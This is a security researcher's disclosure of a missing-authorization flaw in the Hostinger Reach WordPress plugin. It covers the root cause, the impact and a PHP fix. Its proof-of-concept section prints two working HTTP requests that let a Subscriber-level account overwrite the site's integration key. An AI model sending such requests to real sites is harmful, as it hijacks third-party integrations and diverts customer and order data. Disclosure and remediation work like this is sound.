CVE-2026-2515 is a missing authorization vulnerability in the Hostinger Reach WordPress plugin. It allows a low-privilege authenticated user to trigger the admin-only site connection flow and ultimately overwrite the persistent Reach bearer credential stored in WordPress options. The practical security outcome is not a minor UI glitch; it is third-party integration takeover. A Subscriber can rebind the WordPress site to an attacker-controlled Reach tenant, disrupt the legitimate integration, and potentially divert marketing data and automation feeds. On sites where WooCommerce-related automation is enabled, the downstream impact can extend to billing and order PII flowing into the attacker's account, because the plugin believes it is still connected to the correct Reach backend.
| Field | Value |
|---|---|
| CVE | CVE-2026-2515 |
| Plugin version | Hostinger Reach <= 1.3.8 |
| All-time downloads | 12 367 997 |
| Active installations | 1 000 000+ |
| Publicly published | May 12, 2026 |
| Last updated | May 12, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference (MITRE) | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2515 |
| Reference (Wordfence) | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hostinger-reach/hostinger-reach-138-missing-authorization-to-authenticated-subscriber-integration-api-key-update |
Timeline
| Date | Event |
|---|---|
| February 4, 2026 | Plugin testing and vulnerability detection in Hostinger Reach were completed |
| February 4, 2026 | I contacted the plugin author and provided a vulnerability PoC with a description and recommendations for fixing |
| May 12, 2026 | CVE-2026-2515 registered |
Discovery of the Vulnerability
The vulnerable chain starts with the AJAX entrypoint wp_ajax_hostinger_reach_connection_notice_action, exposed through wp-admin/admin-ajax.php. That handler verifies only a nonce via check_ajax_referer and then executes a sensitive action path such as handle_connect without enforcing an administrative capability such as manage_options. That is the first authorization failure: it lets low-privilege users request a connection authorization URL that carries a short-lived CSRF secret token parameter intended for the next binding step. The design inconsistency matters. The equivalent REST API operation that generates the auth URL is protected by a permission check requiring manage_options, which confirms that this is an admin-restricted operation, yet the AJAX route offers an alternative path that bypasses that restriction.

The second step is the REST endpoint used to bind the token. That route accepts a csrf_field and validates it through a CSRF validator, but it requires neither authentication nor a capability check. Once a low-privilege user has obtained the CSRF secret from the first step, they can call the token endpoint and overwrite the stored integration key.

The root cause is the same in both steps. Nonces and CSRF tokens are treated as authorization rather than as request-integrity primitives, and capabilities are not enforced at the entrypoints where the side effects occur.
Understanding Missing Auth Attacks
In WordPress, nonce checks prevent cross-site request forgery. They do not prove that a user is allowed to perform an action; authorization must be enforced with capabilities, and for sensitive operations those capabilities should be administrative. Integration connect flows are among the highest-risk features in plugins because they issue secrets, store bearer tokens, and open a data channel to an external platform. When such flows can be initiated by low roles, a plain Subscriber account becomes a pivot into business data. In real deployments, plugins like this sync leads, user identifiers, and marketing events, and when ecommerce automation is enabled they may also process customer profiles and order metadata. This is why CVE-2026-2515 is not just a privilege escalation inside WordPress: it is an integration credential overwrite that moves trust and data across platforms. Many compromise chains aim for exactly that, because it is stealthier than taking over WordPress directly. The business still sees the plugin working, yet the data is going to the wrong tenant.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-2515, an attacker with Subscriber+ session cookies and the plugin's AJAX nonce (obtainable from the wp-admin pages a Subscriber can load) sends two requests: the first obtains the connection auth URL carrying the CSRF secret, the second uses that secret to bind an attacker-supplied token and overwrite the stored integration key.
POC:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 138.124.55.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://138.124.55.33/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://138.124.55.33
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+

nonce=532e772992&action=hostinger_reach_connection_notice_action&choice=connect


POST /index.php/wp-json/hostinger-reach/v1/token HTTP/1.1
Host: 138.124.55.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://138.124.55.33/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Origin: http://138.124.55.33
DNT: 1
Sec-GPC: 1
Connection: keep-alive

csrf_field=MWkHd1Vd7rxM&token=jAXCgBfhtfEcXOz____REDACTED____qMZDojPDduNMC80927f96____
```
The most severe outcome is silent takeover of the site's external integration. Once the attacker overwrites hostinger_reach_api_key, the plugin may start sending data to the attacker's tenant. That can include marketing leads and site activity data, and customer and order information if WooCommerce automation is enabled. Even without ecommerce, the attacker can disrupt operations by disconnecting the legitimate account, breaking marketing funnels, and forcing administrators to re-authorize the integration. Another realistic scenario is competitive sabotage: an attacker registers an account, rebinds the integration, and the business loses visibility into its own leads while the attacker gains insight into campaign performance. Because the operation is fast and needs only Subscriber access, it can be automated and repeated after every remediation attempt until the underlying authorization checks are fixed.

The problem also creates a cover path for follow-on attacks. By controlling the integration, attackers can influence what external dashboards show, which can be used for social engineering and for hiding abnormal activity. This is why the vulnerability has both confidentiality and integrity dimensions, and why the token overwrite step is the critical escalation point.
Recommendations for Improved Security
The fix must enforce least privilege at both steps of the flow. The AJAX entrypoint that generates the auth URL must require manage_options, or an equivalent administrative capability, before it executes handle_connect. It should check the capability first, then the nonce, and only then perform side effects, because nonce validation alone does not restrict the operation to administrators. The token binding REST endpoint must require authentication and a capability check in its permission callback; a bare csrf_field is not sufficient authorization. If the endpoint must be callable without a session for onboarding, it must use a single-use, time-limited, server-issued binding token tied to the administrator who started the flow and to the specific site, validated server side with strict expiry and replay protection. Integration key changes should be logged with actor, IP, and timestamp, and an admin notice should be shown whenever the key is updated. Site owners should rotate Reach credentials after patching, review integration logs for unexpected rebind events, and restrict wp-admin access for low roles where possible, because exposing admin context to Subscribers increases the chance that nonces are leaked and abused.
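The following is an added illustrative example of the authorization model described in the discovery section and in these recommendations. It is not Hostinger Reach's code and was not taken from the plugin or its fix. The AJAX action name, the REST route hostinger-reach/v1/token, the csrf_field and token parameters and the hostinger_reach_api_key option are the ones named in this write-up; the nonce action name hr_connect, the hr_ helper names, the transient layout, the five-minute lifetime and the placeholder authorize URL are assumptions made for the example. It checks the capability before the nonce at the AJAX entrypoint, requires manage_options in the REST permission callback, makes the binding secret single-use and tied to the issuing administrator and site, and logs every change of the integration key.

```php
<?php
// Added illustrative example (not the plugin's code). Route, option, parameter
// and action names come from the advisory; the nonce action 'hr_connect', the
// hr_ helper names, the transient layout and the TTL are assumptions.

const HR_OPTION_API_KEY = 'hostinger_reach_api_key';
const HR_BIND_TTL       = 300; // seconds a binding secret stays valid (assumed)

/**
 * Step 1 (AJAX): only an administrator may start the connect flow.
 * The capability is checked before the nonce: the nonce proves request
 * integrity and must never be treated as authorization.
 */
function hr_secure_connection_notice_action() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 ); // exits
    }
    check_ajax_referer( 'hr_connect', 'nonce' ); // dies on an invalid nonce

    $choice = isset( $_POST['choice'] ) ? sanitize_text_field( wp_unslash( $_POST['choice'] ) ) : '';
    if ( 'connect' !== $choice ) {
        wp_send_json_error( array( 'message' => 'unknown choice' ), 400 );
    }

    // Server-issued, single-use binding secret bound to this admin and this site.
    // Only a hash of the secret is used as the storage key.
    $secret = wp_generate_password( 32, false, false );
    set_transient(
        'hr_bind_' . hash( 'sha256', $secret ),
        array( 'user_id' => get_current_user_id(), 'site' => get_site_url(), 'issued' => time() ),
        HR_BIND_TTL
    );

    wp_send_json_success( array(
        // Placeholder authorize URL; the real one is issued by the Reach backend.
        'auth_url' => add_query_arg( array( 'csrf_field' => $secret ), 'https://example.invalid/reach/authorize' ),
    ) );
}
add_action( 'wp_ajax_hostinger_reach_connection_notice_action', 'hr_secure_connection_notice_action' );

/**
 * Step 2 (REST): binding the token requires an authenticated administrator
 * AND a valid, unexpired, unused binding secret issued to that same admin.
 */
function hr_bind_token_permission( WP_REST_Request $request ) {
    return current_user_can( 'manage_options' );
}

function hr_bind_token( WP_REST_Request $request ) {
    $secret = (string) $request->get_param( 'csrf_field' );
    $token  = (string) $request->get_param( 'token' );
    if ( '' === $secret || '' === $token ) {
        return new WP_Error( 'hr_bad_request', 'missing parameters', array( 'status' => 400 ) );
    }

    $key   = 'hr_bind_' . hash( 'sha256', $secret );
    $state = get_transient( $key );
    delete_transient( $key ); // single use: consumed whether or not it validates

    if ( ! is_array( $state )
        || (int) $state['user_id'] !== get_current_user_id()
        || $state['site'] !== get_site_url()
        || time() - (int) $state['issued'] > HR_BIND_TTL ) {
        return new WP_Error( 'hr_bad_binding', 'invalid or expired binding secret', array( 'status' => 403 ) );
    }

    update_option( HR_OPTION_API_KEY, $token );
    return rest_ensure_response( array( 'bound' => true ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'hostinger-reach/v1', '/token', array(
        'methods'             => 'POST',
        'callback'            => 'hr_bind_token',
        'permission_callback' => 'hr_bind_token_permission',
    ) );
} );

/**
 * Audit trail: every change of the integration key is logged with actor, IP
 * and time, so an unexpected rebind shows up in the server log.
 */
add_action( 'update_option_' . HR_OPTION_API_KEY, function ( $old_value, $new_value ) {
    error_log( sprintf(
        '[hostinger-reach] api key changed by user %d from %s at %s',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '?',
        gmdate( 'c' )
    ) );
}, 10, 2 );
```

Loaded as a must-use plugin on a test site, both entrypoints reject a Subscriber session with 403 before any side effect runs. The secret is stored only as a hash, so the raw value never sits in the options table, and it is deleted on first use whether or not validation succeeds, so a captured secret cannot be replayed; the user and site checks mean a secret issued to one administrator cannot be consumed by anyone else.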
By taking proactive measures against missing authorization flaws like CVE-2026-2515, WordPress website owners can improve their security posture and protect against exploitation. Stay vigilant, stay secure.